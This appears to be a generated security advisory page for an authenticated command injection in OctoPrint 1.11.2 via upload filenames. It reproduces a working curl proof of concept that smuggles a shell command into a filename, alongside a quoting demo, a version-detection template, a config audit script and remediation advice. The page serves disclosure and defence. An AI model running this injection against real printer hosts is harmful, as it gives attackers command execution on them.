[webapps] OctoPrint 1.11.2 - File Upload
CVE-2025-58180
The file upload function of OctoPrint 1.11.2 accepts filenames containing shell metacharacters; when an administrator-configured system event handler interpolates that filename into a shell command, an authenticated user with upload rights obtains arbitrary command execution on the host.
Critical · CVSS 9.1
📋 Vulnerability Summary
| CVE | CVE-2025-58180 |
|---|---|
| Vulnerability type | Command injection: unsanitized upload filename interpolated into a `system` event handler command |
| Affected versions | OctoPrint <= 1.11.2 |
| Patched version | 1.11.3 |
| Severity | Listed here as Critical · CVSS 9.1; the embedded Exploit-DB header cites 7.5 per the advisory, and the Nuclei template below uses 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) |
| Published | 2026-02-04 |
| Submitter | prabhatverma.addada |
| Source | Exploit-DB original ↗ |
🔬 Root Cause
The upload handler accepts a user-supplied filename that, under the default sanitization rules (`sanitize_name`), may still contain shell metacharacters such as `;` and `${IFS}`. When the upload completes, OctoPrint fires a `FileAdded` event whose payload carries the stored filename and path. If an administrator has configured a `system`-type event subscription whose command uses a placeholder such as `{path}`, the attacker-controlled value is formatted into the command string and executed through `subprocess` with `shell=True` and no escaping of the placeholder, so the metacharacters are interpreted by the shell. The Exploit-DB submission does not name the exact function; the chain is upload → event payload → unescaped placeholder → shell.
🎯 Attack Scenario
1. The attacker holds credentials that allow file upload: a valid session or API key for any user with upload rights. Admin privileges are not required to trigger the bug.
2. Precondition: an administrator has configured a system event handler that runs a shell command containing a filename or path placeholder, for example a `FileAdded` subscription with `command: "{path}"`.
3. The attacker sends a `multipart/form-data` POST to `/api/files/local` with the filename set to `octo;touch${IFS}/tmp/test123;#.gcode`. `${IFS}` stands in for a space so the filename contains none, and the `.gcode` suffix keeps the upload acceptable.
4. The file is stored under that name and `FileAdded` fires. The handler runs `<uploads>/octo;touch${IFS}/tmp/test123;#.gcode` through the shell, which fails on the first token, executes `touch /tmp/test123`, and treats `#.gcode` as a comment.
5. Verification: `/tmp/test123` now exists. Any other command placed between the separators runs the same way.
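The root cause and the scenario above come down to one string operation: a placeholder is formatted into a command template and the result is handed to `/bin/sh`. The following is an added illustration for this page, not OctoPrint's own code. It mimics that pattern next to the quoted form that defuses it, counts the command separators the shell would honour in each, and optionally runs both through `sh`. `UPLOAD_DIR` and `HANDLER_TEMPLATE` are assumptions; the injected filename mirrors the PoC but uses `echo` instead of `touch` so the demo leaves nothing on disk.

```python
"""Why the PoC filename turns into a command, and how quoting stops it.

Added illustration, not OctoPrint's code: mimics the pattern the Exploit-DB
write-up describes (a handler template whose {path} placeholder is formatted
in verbatim and run through sh) beside the quoted form that defuses it.
"""
import shlex
import subprocess
from typing import Optional

# Constructed inputs. INJECTED_NAME mirrors the PoC filename but uses `echo`
# instead of `touch` so running the demo leaves nothing behind on disk.
UPLOAD_DIR = "/srv/octoprint/uploads"          # hypothetical upload root
HANDLER_TEMPLATE = "{path}"                     # the PoC's config.yaml command
INJECTED_NAME = "octo;echo${IFS}INJECTED;#.gcode"
BENIGN_NAME = "ok.gcode"

# Characters that mean something to /bin/sh. A filename containing any of them
# is unsafe to interpolate into a shell command (conservative, constructed set).
SHELL_META = set(";&|`$(){}<>*?!#'\"\\\n\t ")


def render_vulnerable(template: str, path: str) -> str:
    """Format the path in verbatim: the unsafe pattern (shell=True downstream)."""
    return template.format(path=path)


def render_hardened(template: str, path: str) -> str:
    """Quote the placeholder value so the shell sees a single literal word."""
    return template.format(path=shlex.quote(path))


def separator_count(command: str) -> int:
    """Offline check: how many command separators would sh honour?"""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    return sum(1 for tok in lexer if tok in (";", "&", "&&", "|", "||"))


def filename_is_shell_safe(name: str) -> bool:
    """Reject names carrying shell metacharacters (what a strict sanitizer does)."""
    return bool(name) and not (set(name) & SHELL_META)


def run_in_sh(command: str) -> Optional[str]:
    """Run exactly as a shell=True handler would; None if sh cannot be started."""
    try:
        proc = subprocess.run(["sh", "-c", command], capture_output=True,
                              text=True, timeout=5)
    except OSError:
        return None
    return proc.stdout


if __name__ == "__main__":
    path = f"{UPLOAD_DIR}/{INJECTED_NAME}"
    for label, cmd in (("vulnerable", render_vulnerable(HANDLER_TEMPLATE, path)),
                       ("hardened", render_hardened(HANDLER_TEMPLATE, path))):
        print(f"{label}: {cmd}")
        print(f"  separators seen by sh: {separator_count(cmd)}")
        print(f"  stdout: {run_in_sh(cmd)!r}")
    print("benign name passes sanitizer:", filename_is_shell_safe(BENIGN_NAME))
    print("PoC name passes sanitizer:", filename_is_shell_safe(INJECTED_NAME))
```

The vulnerable rendering yields two separators and, when run, prints `INJECTED` after `sh` fails to execute the first token; the hardened rendering is a single quoted word, so `sh` only reports that no such file exists and prints nothing. Quoting at the interpolation point (or avoiding `shell=True` altogether) is the fix; tightening the filename character set is defence in depth.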
💥 Impact
Arbitrary command execution on the host as the account running OctoPrint. Depending on the privileges of that account, this can lead to configuration tampering, credential theft, privilege escalation, and full compromise of the host.
⚔️ Original PoC
The Exploit-DB submission, reproduced below, includes a complete manual PoC. The upload is a `multipart/form-data` POST to `/api/files/local` whose `filename` field carries shell metacharacters; the demonstration payload is `touch /tmp/test123`, written as `touch${IFS}/tmp/test123` so the filename contains no literal space.
# Exploit Author: prabhatverma.addada
# Affected Version(s): <= 1.11.2
# Patched Version(s): 1.11.3
# CVSS (per advisory): 7.5
# Type: Remote Code Execution (requires authenticated upload / API key or session)
#
# Short description:
# An authenticated attacker with file-upload access can craft a filename containing shell metacharacters (e.g. ';', ${IFS}) which bypasses filename
# sanitization and, when interpolated into a configured system event handler command, results in arbitrary command execution on the host.
#
# Scope & privileges:
# - Trigger privileges: Authenticated file-upload (API key or valid session). NO admin/root required to trigger the attack.
# - Precondition: A system event handler that executes shell commands using filename/path placeholders must be configured by an administrator.
#
# - OctoPrint 1.11.2 running via `octoprint serve --port 5000` on Ubuntu 22.04
#
# Reproduction / PoC (manual):
#
# 1) Start OctoPrint 1.11.2:
# octoprint serve --port 5000 --debug
# Complete initial setup at http://127.0.0.1:5000 and create an admin user.
#
# 2) Configure a system event handler that runs shell commands with filename placeholders:
# Edit ~/.octoprint/config.yaml and add:
#
#   events:
#     enabled: true
#     subscriptions:
#       - event: FileAdded
#         type: system
#         debug: true
#         command: "{path}"
#
# Restart OctoPrint.
#
# 3) Create a harmless test gcode:
# mkdir -p /tmp/gcode
# cat > /tmp/gcode/ok.gcode <<'EOF'
# ; minimal gcode
# G28
# M105
# EOF
#
# 4) Obtain API key from Settings -> API and export it:
# export API_KEY='<your_api_key_here>'
#
# 5) Ensure target proof file does not exist:
# ls -la /tmp/test123
#
# 6) PoC upload (non-destructive proof):
# INJECT_NAME='octo;touch${IFS}/tmp/test123;#.gcode'
#
# curl -sS -X POST -H "X-Api-Key: $API_KEY" \
# -F "file=@/tmp/gcode/ok.gcode;filename=\"${INJECT_NAME}\"" \
# "http://127.0.0.1:5000/api/files/local"
#
# 7) Verify execution:
# ls -la /tmp/test123
# If /tmp/test123 exists, the injected command executed and RCE is demonstrated.
#
# Explanation:
# - OctoPrint accepted the uploaded filename (sanitize_name allowed these characters in default config).
# - FileAdded event payload contains the filename/path.
# - A system event subscriber executed a shell command with that placeholder via subprocess with shell=True and without placeholder escaping.
# - Shell metacharacters in the filename are interpreted by the shell and executed.
#
# Mitigations / Workarounds:
# - Upgrade OctoPrint to 1.11.3 (patched).
# - Disable event handlers using filename placeholders (set enabled: false or uncheck in GUI Event Manager).
# - Set feature.enforceReallyUniversalFilenames: true in config.yaml and vet existing uploads.
# - Do not expose OctoPrint to hostile networks; restrict upload access.
#
# - GitHub Security Advisory: https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-49mj-x8jp-qvfc
# - PoC repo: https://github.com/prabhatverma47/CVE-2025-58180
#
# Notes for triage:
# - Exploit requires only authenticated upload privileges to trigger. No admin/root required to perform the attack.
# - PoC uses non-destructive `touch /tmp/test123`.
🔍 Nuclei Detection Template
The template below fingerprints the OctoPrint version exposed by the target. It only extracts the version string; it does not attempt an upload or trigger an event handler, and it does not compare the extracted value against the patched release, so the operator must check the result against 1.11.3 to decide whether a host is affected.
```yaml
id: CVE-2025-58180-detection

info:
  name: OctoPrint <= 1.11.2 - Version Detection
  author: prabhatverma.addada
  severity: medium
  description: Detects OctoPrint versions 1.11.2 or earlier which are vulnerable to authenticated file upload RCE via shell metacharacters in filenames.
  reference:
    - https://github.com/OctoPrint/OctoPrint
    - https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-49mj-x8jp-qvfc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2025-58180
  tags: cve,cve2025,octoprint,version

http:
  # /api/version answers {"api": "...", "server": "1.11.2", "text": "OctoPrint 1.11.2"}.
  # The server version lives under the "server" key, so both the matcher and the
  # extractor work on that key rather than on a "version" key the body does not have.
  - raw:
      - |
        GET /api/version HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - '"server":'
          - '"api":'
        condition: and
      - type: regex
        part: body
        regex:
          - '"server":\s*"([0-9]+\.[0-9]+\.[0-9]+)"'
    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - '"server":\s*"([0-9]+\.[0-9]+\.[0-9]+)"'
        internal: true
    req-condition: true
    max-size: 256

  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: word
        words:
          - 'OctoPrint'
          - '<title>OctoPrint</title>'
        condition: or
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        name: version
        part: body
        regex:
          - 'OctoPrint\s+v?([0-9]+\.[0-9]+\.[0-9]+)'
        internal: true
      - type: regex
        name: version
        part: body
        regex:
          - '"version":"([0-9]+\.[0-9]+\.[0-9]+)"'
        internal: true
    req-condition: true
    max-size: 8192

  - raw:
      - |
        GET /plugin/softwareupdate/check?update_info= HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: word
        words:
          - 'OctoPrint'
        part: body
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        name: version
        part: body
        regex:
          - '"current":\s*"([0-9]+\.[0-9]+\.[0-9]+)"'
        internal: true
    req-condition: true
    max-size: 1024
```
🛡️ Remediation
Upgrade to OctoPrint 1.11.3 or later. Until the upgrade is done: disable or rewrite any `system`-type event handler whose command uses a filename-derived placeholder such as `{path}` (Settings → Event Manager, or `events.subscriptions` in `config.yaml`); set `feature.enforceReallyUniversalFilenames: true` in `config.yaml` and review files already uploaded; restrict upload rights to trusted accounts and keep the instance off hostile networks. A WAF rule that blocks `../` or absolute paths does not address this issue, because the payload is shell metacharacters in the filename, not a path traversal sequence.
📎 References
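The workaround the Exploit-DB write-up gives, disabling event handlers that use filename placeholders, is easy to check mechanically. The following is an added example for this page, not OctoPrint's own tooling: it walks the `events.subscriptions` section of `config.yaml` and reports `system`-type handlers whose command interpolates a filename-derived placeholder. The PoC uses `{path}`; the other placeholder names in the set are assumptions, so check them against the OctoPrint events documentation. The sample config is constructed to mirror the PoC.

```python
"""Audit config.yaml for the precondition CVE-2025-58180's PoC needs: a system
event handler whose shell command interpolates a filename-derived placeholder.

Added example for this page, not OctoPrint's own tooling. FILE_PLACEHOLDERS is
an assumption drawn from the PoC's {path}; SAMPLE_CONFIG is constructed.
"""
import re
from typing import List, Tuple

# Assumed placeholder names whose value derives from an uploaded filename.
FILE_PLACEHOLDERS = {"path", "name", "filename", "__filename", "__filepath"}
PLACEHOLDER_RE = re.compile(r"\{([A-Za-z_][A-Za-z0-9_]*)\}")

# Constructed sample mirroring the PoC config plus a few realistic neighbours.
SAMPLE_CONFIG = {
    "events": {
        "enabled": True,
        "subscriptions": [
            {"event": "FileAdded", "type": "system", "debug": True,
             "command": "{path}"},
            # Quoting inside the template is not a fix: a filename containing
            # a single quote ends the quoted region early.
            {"event": "PrintDone", "type": "system",
             "command": "/usr/local/bin/notify '{name}'"},
            {"event": "Startup", "type": "system",
             "command": "/usr/local/bin/healthcheck"},
            # gcode-type handlers are sent to the printer, not to /bin/sh.
            {"event": "FileAdded", "type": "gcode", "command": "M117 {name}"},
        ],
    }
}

Finding = Tuple[str, str, List[str]]


def risky_subscriptions(config: dict) -> List[Finding]:
    """Return (event, command, placeholders) for each shell handler at risk."""
    events = config.get("events") or {}
    if not events.get("enabled", False):
        return []                       # disabled handlers never run
    findings: List[Finding] = []
    for sub in events.get("subscriptions") or []:
        if sub.get("type") != "system":
            continue                    # only system handlers reach a shell
        commands = sub.get("command")
        if isinstance(commands, str):
            commands = [commands]       # accept a single command or a list
        for cmd in commands or []:
            hits = sorted(set(PLACEHOLDER_RE.findall(cmd)) & FILE_PLACEHOLDERS)
            if hits:
                findings.append((sub.get("event", "?"), cmd, hits))
    return findings


def audit_config_file(path: str) -> List[Finding]:
    """Load a real ~/.octoprint/config.yaml (needs PyYAML) and audit it."""
    import yaml  # imported lazily so the rest runs without PyYAML installed
    with open(path, encoding="utf-8") as fh:
        return risky_subscriptions(yaml.safe_load(fh) or {})


if __name__ == "__main__":
    for event, cmd, hits in risky_subscriptions(SAMPLE_CONFIG):
        print(f"[{event}] {cmd!r} interpolates {', '.join(hits)} into a shell command")
```

On the sample config the audit flags the PoC handler and the quoted `notify` handler, and ignores the static `healthcheck` command and the `gcode`-type handler. Run `audit_config_file("~/.octoprint/config.yaml")` (expanded) against a live instance; any finding is a handler to disable or to rewrite without the placeholder until the upgrade to 1.11.3.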
- https://nvd.nist.gov/vuln/detail/CVE-2025-58180
- https://github.com/OctoPrint/OctoPrint/releases
- Exploit-DB original
⚠️ This article is based on public vulnerability databases and is intended for security research and defensive reference only. Generated: 2026-05-07 06:31 | Source: Exploit-DB